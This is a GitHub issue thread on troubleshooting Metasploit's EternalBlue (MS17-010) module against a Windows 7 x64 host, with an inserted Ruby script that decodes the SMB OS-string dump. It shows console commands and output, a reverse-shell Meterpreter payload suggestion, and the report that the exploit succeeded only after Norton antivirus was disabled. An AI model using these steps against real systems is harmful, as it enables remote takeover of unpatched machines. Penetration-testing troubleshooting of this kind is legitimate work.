rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

ms17_010_eternalblue - Unable to continue with improper OS Arch / RubySMB Error #9894

Closed genaray closed 6 years ago

genaray commented 6 years ago

I'm pretty new to Metasploit, so I will try to explain my problem as well as I can.

  1. Download Metasploit Framework (latest) for Windows
  2. Install and open console
  3. Use module windows/smb/ms17_010_eternalblue

First I set the target to 0; I'm running Win7 Professional on my machine, it is x64 based. Right after that I set the RHOST to the certain IPv4.

When I hit exploit/run, this shows up:

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set target 0
target => 0
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.0.176
RHOST => 192.168.0.176
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.0.12:4444
[*] 192.168.0.176:445 - Connecting to target for exploitation.
[+] 192.168.0.176:445 - Connection established for exploitation.
[+] 192.168.0.176:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.176:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.0.176:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.0.176:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.0.176:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[!] 192.168.0.176:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 192.168.0.176:445 - Disable VerifyArch option to proceed manually...
[-] 192.168.0.176:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.

When I disable VerifyArch, it skips this part and I get this error message:

RubySMB : ERROR : Communication Error : An error occured reading from the socket

I'm totally stuck and have no idea why it won't work... A bit of help would be great!
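The "CORE raw buffer dump" in the output above is the SMB native-OS string the module used for its VerifyTarget decision; the VerifyArch decision is made from a separate DCE/RPC reply that the module does not dump, so the arch it saw is not visible in the log. The following is an added example, not code from the metasploit-framework project or from this issue: it decodes the dump lines back into the OS string and applies a target-0 check of the same kind the module performs. The constant names, the matching rules and the sample input are this example's own assumptions.

```ruby
# Added example (not metasploit-framework code): decode the console's
# "CORE raw buffer dump" lines back into the SMB native-OS string and apply
# a VerifyTarget-style check for target 0 (Windows 7 / Server 2008 R2, x64).

# Constructed sample: the dump lines from the issue, exactly as the console printed them.
SAMPLE_DUMP = <<~'DUMP'
  [*] 192.168.0.176:445 - CORE raw buffer dump (42 bytes)
  [*] 192.168.0.176:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
  [*] 192.168.0.176:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
  [*] 192.168.0.176:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
DUMP

# Pull the hex bytes out of each "0x........  xx xx ..." line and rebuild the string.
# The ASCII column on the right is only a rendering of the same bytes and is ignored;
# lines without an offset (the "(42 bytes)" header) are skipped.
def decode_core_buffer(dump)
  bytes = []
  dump.each_line do |line|
    m = line.match(/0x[0-9a-f]{8}\s+((?:[0-9a-f]{2}\s)+)/i)
    next unless m
    bytes.concat(m[1].split.map { |h| h.to_i(16) })
  end
  bytes.pack('C*').force_encoding('UTF-8')
end

# Assumption for this example: target 0 covers the two NT 6.1 products the module
# lists, so accept only OS strings that name one of them.
TARGET0_OS_PATTERNS = [/\AWindows 7\b/, /\AWindows Server 2008 R2\b/].freeze

def os_matches_target0?(os_string)
  TARGET0_OS_PATTERNS.any? { |re| os_string.match?(re) }
end

# The native-OS string carries the build number (7601 is Windows 7 SP1). Take the
# last 4-5 digit token so product names such as "Server 2008" or "2012" are not mistaken for it.
def build_number(os_string)
  token = os_string.scan(/\b\d{4,5}\b/).last
  token && token.to_i
end

if __FILE__ == $PROGRAM_NAME
  os = decode_core_buffer(SAMPLE_DUMP)
  puts "native OS : #{os.inspect} (#{os.bytesize} bytes)"
  puts "build     : #{build_number(os)}"
  puts "target 0  : #{os_matches_target0?(os) ? 'OS string matches' : 'OS string does not match'}"
end
```

Running this on the dump from the issue yields the 42-byte string "Windows 7 Professional 7601 Service Pack 1", which passes the target-0 OS check, consistent with the "Target OS selected valid" line in the log. The subsequent VerifyArch failure cannot be reproduced from the dump because the arch comes from the DCE/RPC reply, which is not printed.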

busterb commented 6 years ago

I don't see you setting a payload here. Can you try:

set payload windows/x64/meterpreter/reverse_https or similar?

wvu commented 6 years ago

I would like to add better printing around VerifyArch, since it doesn't use print_core_buffer. Hopefully this will track down the issue better when it comes up yet again.

@genaray: What you're seeing usually means the target's arch is wrong, but I suspect it's correct and "failing closed" on exploitation for some reason.

genaray commented 6 years ago

So I solved it... Norton blocked every attack... once I disabled it, it went like a charm! Thanks for your help :grinning:

troyam commented 4 years ago

it, it went like a charm! Thanks for your help 😀

Can you explain more? Thanks